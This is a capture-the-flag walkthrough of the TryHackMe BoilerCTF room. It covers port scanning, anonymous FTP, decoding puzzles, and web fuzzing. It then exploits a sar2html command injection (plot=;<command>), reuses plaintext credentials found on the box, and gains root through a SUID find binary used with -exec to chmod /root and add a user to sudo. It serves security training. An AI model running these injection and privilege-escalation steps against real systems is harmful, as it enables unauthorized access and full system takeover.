BoilerCTF
Another room from TryHackMe and it’s rated as intermediate. Let’s start by running a port scan.
Enumeration
root@cyberspace:~/thm/boilerctf# nmap -T4 -sS -sV -sC -oN nmap/portscan -p- boilerctf.thm Starting Nmap 7.80 ( https://nmap.org ) at 2019-08-26 22:41 CEST Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn Nmap done: 1 IP address (0 hosts up) scanned in 3.16 seconds
Host down…..Let’s see if I can ping the machine.
root@cyberspace:~/thm/boilerctf# ping boilerctf.thm PING boilerctf.thm (10.10.238.14) 56(84) bytes of data. 64 bytes from boilerctf.thm (10.10.238.14): icmp_seq=1 ttl=63 time=38.2 ms 64 bytes from boilerctf.thm (10.10.238.14): icmp_seq=2 ttl=63 time=41.3 ms 64 bytes from boilerctf.thm (10.10.238.14): icmp_seq=3 ttl=63 time=47.6 ms 64 bytes from boilerctf.thm (10.10.238.14): icmp_seq=4 ttl=63 time=38.8 ms
Yes I can. For those who wonder why I ping boilerctf.thm…….this is because I get an hour for a room at TryHackMe. If I run out of time or restart the room I get another IP address to attack. When I add the current IP address to /etc/hosts I can use the domain name instead of remember the IP address with every change.
But because I can ping the machine, I run the port scan again, but this time I add the option -Pn, which tells nmap to skip host discovery and treat all hosts as online.
root@cyberspace:~/thm/boilerctf# nmap -T4 -sS -sV -sC -Pn -oN nmap/portscan -p- boilerctf.thm Starting Nmap 7.80 ( https://nmap.org ) at 2019-08-26 22:42 CEST Nmap scan report for boilerctf.thm (10.10.238.14) Host is up (0.049s latency). Not shown: 65531 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 |_ftp-anon: Anonymous FTP login allowed (FTP code 230) | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.8.2.111 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 1 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 10000/tcp open http MiniServ 1.930 (Webmin httpd) |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1). 55007/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 e3:ab:e1:39:2d:95:eb:13:55:16:d6:ce:8d:f9:11:e5 (RSA) | 256 ae:de:f2:bb:b7:8a:00:70:20:74:56:76:25:c0:df:38 (ECDSA) |_ 256 25:25:83:f2:a7:75:8a:a0:46:b2:12:70:04:68:5c:cb (ED25519) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 85.21 seconds
With this option active I get a better result from nmap. The following ports are open:
- 21 | FTP (vsftpd version 3.0.3)
- 80 | HTTP (Apache version 2.4.18 for Ubuntu)
- 10000 | HTTP (MiniServ version 1.930)
- 55007 | SSH (OpenSSH version 7.2p2)
FTP
From the nmap scan I can see that anonymous login is enabled on this FTP server. So let’s see if there is something useful to be found.
root@cyberspace:~/thm/boilerctf/ftp# ftp -p boilerctf.thm Connected to boilerctf.thm. 220 (vsFTPd 3.0.3) Name (boilerctf.thm:root): anonymous 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls -lah 227 Entering Passive Mode (10,10,238,14,161,127). 150 Here comes the directory listing. drwxr-xr-x 2 ftp ftp 4096 Aug 22 12:05 . drwxr-xr-x 2 ftp ftp 4096 Aug 22 12:05 .. -rw-r--r-- 1 ftp ftp 74 Aug 21 15:42 .info.txt 226 Directory send OK.
There is a file with the extension txt. If I only used the command ls or dir, I wouldn’t have found anything, because the file is marked as hidden (there is a dot in front of its filename). Also I used the -p option to activate passive ftp. This way the client (me) is making all the requests and is initiating the connections instead of active FTP where the server tries to sent data via port 20.
ftp> get .info.txt local: .info.txt remote: .info.txt 227 Entering Passive Mode (10,10,238,14,158,87). 150 Opening BINARY mode data connection for .info.txt (74 bytes). WARNING! 1 bare linefeeds received in ASCII mode File may not have transferred correctly. 226 Transfer complete. 74 bytes received in 0.00 secs (16.6090 kB/s) ftp> bye 221 Goodbye.
I downloaded the file. Now to see what’s in it.
root@cyberspace:~/thm/boilerctf/ftp# cat .info.txt Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl!
My first guess is some kind of rotation. It looks like there are some dots to end the sentence, a colon and a exclamation mark. There is a nifty site where you can try to use a frequency analysis attack on this sequence, which is called CyberChef.
My first guess was correct, because when I choose ROT13 I get a readable string: Just wanted to see if you find it. Lol. Remember: Enumeration is the key!
No real info, so on to the next service.
Webserver
When directing my browser to the site I get a default Apache page. From the nmap scan I know there is a robots.txt file.
User-agent: * Disallow: / /tmp /.ssh /yellow /not /a+rabbit /hole /or /is /it 079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 089 109 070 104 078 084 069 049 079 068 081 075
And this is why I like CTF based challenges. Is this a rabbit hole or a puzzle that needs to be solved. While wrapping my head around this string, I run a webfuzzer in the background. There are many tools for this like Gobuster, Dirb, Dirbuster and many more. I like DirSearch a lot. This tool doesn’t come by default with Kali and if you want to give it a try, you can find it on github.
root@cyberspace:~/TryHackMe/boiler# dirsearch -u http://boilerctf.thm -e php -f -x 400,403 _|. _ _ _ _ _ _|_ v0.3.8 (_||| _) (/_(_|| (_| ) Extensions: php | HTTP method: get | Threads: 10 | Wordlist size: 10301 Error Log: /opt/tools/dirsearch/logs/errors-19-09-03_10-39-49.log Target: http://boilerctf.thm [10:39:49] Starting: [10:40:54] 200 - 12KB - /joomla/ [10:40:54] 200 - 5KB - /joomla/administrator/ [10:40:59] 200 - 626B - /manual/ Task Completed
With this tool I used certain flags to help get a better result. The -u flag is a mandatory one as it defines the URL it needs to scan. The -e flag is for which extension to scan. This flag is also a mandatory one and it needs at least one extension. You can add more extensions by concatenating them with a comma. The -f flag is for forcing the used extensions with the chosen wordlist (the same as can be done with Dirbuster) and the -x flag, which is used to filter out HTTP response codes (400 being page not found and 403 being page is restricted – more on these codes can be found with Google). There is another flag which is very useful and that is the -w flag. This flag lets you choose the preferred wordlist. For more options you can always use the -h flag.
I can use the -r flag, which lets DirSearch do a recursive scan (which I don’t prefer), but instead I run another aimed scan on the /joomla/ folder.
root@cyberspace:~/TryHackMe/boiler# dirsearch -u http://boilerctf.thm/joomla/ -e php -f -x 400,403 _|. _ _ _ _ _ _|_ v0.3.8 (_||| _) (/_(_|| (_| ) Extensions: php | HTTP method: get | Threads: 10 | Wordlist size: 10301 Error Log: /opt/tools/dirsearch/logs/errors-19-09-03_11-18-07.log Target: http://boilerctf.thm/joomla/ [11:18:08] Starting: [11:18:22] 200 - 168B - /joomla/_files/ [11:18:23] 200 - 5KB - /joomla/_test/ [11:18:37] 200 - 5KB - /joomla/administrator/ [11:18:39] 200 - 31B - /joomla/administrator/logs/ [11:18:39] 200 - 5KB - /joomla/administrator/index.php/ [11:18:39] 200 - 5KB - /joomla/administrator/index.php [11:18:48] 200 - 31B - /joomla/bin/ [11:18:50] 200 - 3KB - /joomla/build/ [11:18:51] 200 - 31B - /joomla/cache/ [11:18:54] 200 - 31B - /joomla/components/ [11:18:56] 200 - 0B - /joomla/configuration.php/ [11:19:13] 200 - 31B - /joomla/images/ [11:19:14] 200 - 31B - /joomla/includes/ [11:19:15] 303 - 0B - /joomla/index.php/login/ [11:19:15] 200 - 12KB - /joomla/index.php/ [11:19:16] 200 - 12KB - /joomla/index.php [11:19:16] 200 - 6KB - /joomla/installation/ [11:19:18] 200 - 31B - /joomla/language/ [11:19:20] 200 - 31B - /joomla/libraries/ [11:19:24] 200 - 31B - /joomla/media/ [11:19:26] 200 - 31B - /joomla/modules/ [11:19:37] 200 - 31B - /joomla/plugins/ [11:19:53] 200 - 31B - /joomla/templates/ [11:19:54] 200 - 2KB - /joomla/tests/ [11:19:55] 200 - 31B - /joomla/tmp/ Task Completed
The first 2 hits are a bit off. When curling them I get some base64 encoded text.
root@cyberspace:/opt/tools/cmsmap# curl -s http://boilerctf.thm/joomla/_files/ <!DOCTYPE html> <html> <head> <title>Woops</title> </head> <body> <div align=center><h1 style=color:red>VjJodmNITnBaU0JrWVdsemVRbz0K</h1></div> </body> </html>
To decode base64 you can use some online tools or use the tools available on Kali.
root@cyberspace:/opt/tools/cmsmap# echo "VjJodmNITnBaU0JrWVdsemVRbz0K" | base64 -d V2hvcHNpZSBkYWlzeQo=
More base64. One more time by hand and if there is more, I’ll try a loop.
root@cyberspace:/opt/tools/cmsmap# echo "VjJodmNITnBaU0JrWVdsemVRbz0K" | base64 -d | base64 -d Whopsie daisy
Guess this was it. But it looks like another rabbit hole. The other folder which seemed a bit off was the folder /_test/. When directing my browser to that folder I get an interesting response. On this page runs software called sar2html. Sar2html is a Web-based front end for performance monitoring. It converts sar binary data to graphical format. The last update was performed in 2013. When looking at the offline version of exploit database I can see there is a remote code execution (RCE) vulnerability.
root@cyberspace:~/TryHackMe/boiler# searchsploit sar2html
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Sar2HTML 3.2.1 - Remote Command Execution | exploits/php/webapps/47204.txt
--------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
# Exploit Title: sar2html Remote Code Execution # Date: 01/08/2019 # Exploit Author: Furkan KAYAPINAR # Vendor Homepage:https://github.com/cemtan/sar2html # Software Link: https://sourceforge.net/projects/sar2html/ # Version: 3.2.1 # Tested on: Centos 7 In web application you will see index.php?plot url extension. http://<ipaddr>/index.php?plot=;<command-here> will execute the command you entered. After command injection press "select # host" then your command's output will appear bottom side of the scroll screen.
That’s not that hard to test.
This exploit seems to work.
With the command cat I can read the file called log.txt
Looks like credentials. I know from the nmap scan that an SSH server is running on port 55007.
root@cyberspace:~/TryHackMe/boiler# ssh basterd@boilerctf.thm -p 55007 The authenticity of host '[boilerctf.thm]:55007 ([10.10.161.72]:55007)' can't be established. ECDSA key fingerprint is SHA256:mvrEiZlb4jqadxXJccZYZkCL/DHElLVQ74eKaSKZiRk. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '[boilerctf.thm]:55007,[10.10.161.72]:55007' (ECDSA) to the list of known hosts. basterd@boilerctf.thm's password: Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-142-generic i686) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage 8 packages can be updated. 8 updates are security updates. Last login: Thu Aug 22 12:29:45 2019 from 192.168.1.199 $ id uid=1001(basterd) gid=1001(basterd) groups=1001(basterd)
Some basic enumeration starts in the home folder of the compromised user and that’s where I find another set of credentials.
basterd@Vulnerable:~$ cat backup.sh
REMOTE=1.2.3.4
SOURCE=/home/stoner
TARGET=/usr/local/backup
LOG=/home/stoner/bck.log
DATE=`date +%y\.%m\.%d\.`
USER=stoner
#superduperp@$$no1knows
ssh $USER@$REMOTE mkdir $TARGET/$DATE
if [ -d "$SOURCE" ]; then
for i in `ls $SOURCE | grep 'data'`;do
echo "Begining copy of" $i >> $LOG
scp $SOURCE/$i $USER@$REMOTE:$TARGET/$DATE
echo $i "completed" >> $LOG
if [ -n `ssh $USER@$REMOTE ls $TARGET/$DATE/$i 2>/dev/null` ];then
rm $SOURCE/$i
echo $i "removed" >> $LOG
echo "####################" >> $LOG
else
echo "Copy not complete" >> $LOG
exit 0
fi
done
else
echo "Directory is not present" >> $LOG
exit 0
fi
Changing user.
basterd@Vulnerable:~$ su stoner Password: stoner@Vulnerable:/home/basterd$ id uid=1000(stoner) gid=1000(stoner) groups=1000(stoner),4(adm),24(cdrom),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
Does this user have sudo rights?
stoner@Vulnerable:/home/basterd$ sudo -l
User stoner may run the following commands on Vulnerable:
(root) NOPASSWD: /NotThisTime/MessinWithYa
And another red haring. Back to his root folder.
stoner@Vulnerable:~$ ls -lah total 16K drwxr-x--- 3 stoner stoner 4.0K Aug 22 16:25 . drwxr-xr-x 4 root root 4.0K Aug 22 10:42 .. drwxrwxr-x 2 stoner stoner 4.0K Aug 22 16:05 .nano -rw-r--r-- 1 stoner stoner 34 Aug 21 18:05 .secret stoner@Vulnerable:~$ cat .secret You made it till here, well done.
Let’s see what is listening.
stoner@Vulnerable:~$ netstat -plant (No info could be read for "-p": geteuid()=1000 but you should be root.) Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name tcp 0 0 0.0.0.0:55007 0.0.0.0:* LISTEN - tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN - tcp 0 0 0.0.0.0:10000 0.0.0.0:* LISTEN - tcp 0 476 10.10.161.72:55007 10.8.2.111:59528 ESTABLISHED - tcp6 0 0 :::21 :::* LISTEN - tcp6 0 0 :::55007 :::* LISTEN - tcp6 0 0 :::80 :::* LISTEN -
Looks like a mySQL server is running locally. But when I try to gain access it denies every try. No go here. From earlier enumeration I saw my current user has LXD rights. This could be a way to escalate your privileges, but in this case it looks like a rabbit hole.
Escalation of Privilege
One of the things you need to look at during system enumeration is files with the SUID bit set. What is the SUID bit?
SUID (Set owner User ID up on execution) is a special type of file permissions given to a file. Normally in Linux/Unix when a program runs, it inherits access permissions from the logged in user. SUID is defined as giving temporary permissions to a user to run a program/file with the permissions of the file owner rather that the user who runs it.
To find files with the SUID bit set, you can run the following command:
stoner@Vulnerable:~$ find / -perm /4000 -type f -exec ls -ld {} \; 2>/dev/null
-rwsr-xr-x 1 root root 38900 Mar 26 21:29 /bin/su
-rwsr-xr-x 1 root root 30112 Jul 12 2016 /bin/fusermount
-rwsr-xr-x 1 root root 26492 May 15 23:43 /bin/umount
-rwsr-xr-x 1 root root 34812 May 15 23:43 /bin/mount
-rwsr-xr-x 1 root root 43316 May 7 2014 /bin/ping6
-rwsr-xr-x 1 root root 38932 May 7 2014 /bin/ping
-rwsr-xr-x 1 root root 13960 Mar 27 16:39 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-- 1 root www-data 13692 Apr 3 20:55 /usr/lib/apache2/suexec-custom
-rwsr-xr-- 1 root www-data 13692 Apr 3 20:55 /usr/lib/apache2/suexec-pristine
-rwsr-xr-- 1 root messagebus 46436 Jun 10 22:45 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 513528 Mar 4 2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 5480 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 36288 Mar 26 21:29 /usr/bin/newgidmap
-r-sr-xr-x 1 root root 232196 Feb 8 2016 /usr/bin/find
-rwsr-sr-x 1 daemon daemon 50748 Jan 15 2016 /usr/bin/at
-rwsr-xr-x 1 root root 39560 Mar 26 21:29 /usr/bin/chsh
-rwsr-xr-x 1 root root 74280 Mar 26 21:29 /usr/bin/chfn
-rwsr-xr-x 1 root root 53128 Mar 26 21:29 /usr/bin/passwd
-rwsr-xr-x 1 root root 34680 Mar 26 21:29 /usr/bin/newgrp
-rwsr-xr-x 1 root root 159852 Jun 11 01:53 /usr/bin/sudo
-rwsr-xr-x 1 root root 18216 Mar 27 16:39 /usr/bin/pkexec
-rwsr-xr-x 1 root root 78012 Mar 26 21:29 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 36288 Mar 26 21:29 /usr/bin/newuidmap
With this command I used the find command to search for files recursively from the root folder and so on. Next I used the -perm flag to filter on a specific permission setting. In this case /4000 which is the numerical representation of the SUID bit enabled. Because I only want files, I used the -type f flag and the last flag I used is -exec, which let’s me execute a command with the findings from find in an array. In this case I used ls -ld to show the owner of the found files and the date of creation (which always is a good indicator which file was tempered with or created for the purpose of the challenge. Finally I ended with 2>/dev/null, which redirects all stderr (errors) to /dev/null and destroys them instead of showing them on screen and polluting my results.
In the list of files there is an interesting on, namely the command find itself. The command find has, like I showed above, an -exec flag where you can execute commands. Because the command has the SUID of root set, I can execute commands as root. Let’s test this.
stoner@Vulnerable:~$ find . -exec touch test.txt \; stoner@Vulnerable:~$ ls -lah total 20K drwxr-x--- 4 stoner stoner 4.0K Sep 5 15:13 . drwxr-xr-x 4 root root 4.0K Aug 22 10:42 .. drwx------ 2 stoner stoner 4.0K Sep 5 14:41 .cache drwxrwxr-x 2 stoner stoner 4.0K Aug 22 16:05 .nano -rw-r--r-- 1 stoner stoner 34 Aug 21 18:05 .secret -rw-rw-r-- 1 root stoner 0 Sep 5 15:13 test.txt
In this example I created a file through the exec flag of find and it created a file with as owner root and group stoner. I can do several things with this, but as I want access to the /root folder, I’m going to give myself better access.
stoner@Vulnerable:~$ find . -exec chmod -R 777 /root \; stoner@Vulnerable:~$ cd /root stoner@Vulnerable:/root$ ls -lah total 12K drwxrwxrwx 2 root root 4.0K Aug 22 12:25 . drwxr-xr-x 22 root root 4.0K Aug 22 12:22 .. -rwxrwxrwx 1 root root 29 Aug 21 19:25 root.txt stoner@Vulnerable:/root$ cat root.txt It wasn't that hard, was it?
Here I changed the folder /root to rwxrwxrwx (777) so everyone can open the files and folders in it.
Another way of getting access to folder /root is by adding yourself to the sudo group and then escalating to root.
stoner@Vulnerable:/root$ find . -exec usermod -aG sudo stoner \;
stoner@Vulnerable:/root$ su stoner
Password:
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
stoner@Vulnerable:/root$ id
uid=1000(stoner) gid=1000(stoner) groups=1000(stoner),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
stoner@Vulnerable:/root$ sudo -l
User stoner may run the following commands on Vulnerable:
(ALL : ALL) ALL
(root) NOPASSWD: /NotThisTime/MessinWithYa
stoner@Vulnerable:/root$ sudo su -
[sudo] password for stoner:
root@Vulnerable:~#
One thing to remember is that I loaded my bash shell again by executing the command su stoner after I was added to the sudo group. Without this step it wouldn’t work as the environment of the current bash shell wasn’t loaded properly. After that I used sudo to jump to user root and because I had sudo rights to act as root, there were no restrictions to stop me.
And there you have it. A really fun CTF based challenge to test your skills and learn some new things.